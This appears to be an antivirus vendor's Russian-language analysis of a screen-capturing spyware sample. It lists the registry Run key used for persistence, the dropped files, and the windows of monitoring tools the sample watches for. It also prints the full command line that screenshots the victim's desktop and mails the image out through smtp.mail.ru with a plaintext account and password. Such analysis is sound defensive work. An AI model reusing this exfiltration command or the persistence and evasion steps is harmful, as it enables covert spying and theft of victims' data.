Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'DF Manager' = '"<Полный путь к вирусу>"'
Вредоносные функции:
Создает и запускает на исполнение:
- '%WINDIR%\odbconfig.exe' -smtp smtp.mail.ru -port 465 -user lzw1933@mail.ru -pass "spiderweb$+1988" -f lzw1933@mail.ru -t lzw1933@mail.ru -sub CRNJEUFU/27-6-2013 -ssl -auth -attach "%WINDIR%\winlib.jpg,image/jpeg" -M "CRNJEUFU - %USERNAME% - United States - 18:26"
- '%WINDIR%\xvmsetup.exe' /capture /filename %WINDIR%\winlib.jpg /quality 75
- '%WINDIR%\solitaire2.exe'
Изменения в файловой системе:
Создает следующие файлы:
- %WINDIR%\solitaire2.exe
- <SYSTEM32>\d3d9caps.dat
- %WINDIR%\odbconfig.exe
- %WINDIR%\xvmsetup.exe
Сетевая активность:
Подключается к:
- '94.##0.191.201':465
UDP:
- DNS ASK sm##.mail.ru
Другое:
Ищет следующие окна:
- ClassName: '(null)' WindowName: 'System Configuration'
- ClassName: '(null)' WindowName: 'Utilitaire de configuration syst?me'
- ClassName: '(null)' WindowName: 'Autoruns [CRNJEUFU\%USERNAME%] - Sysinternals: www.sysinternals.com'
- ClassName: '(null)' WindowName: 'System Configuration Utility'
- ClassName: '(null)' WindowName: 'Configuration du syst?me'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'SysListView32' WindowName: '(null)'
- ClassName: '(null)' WindowName: 'Registry Editor'
- ClassName: '(null)' WindowName: '?diteur du Registre'
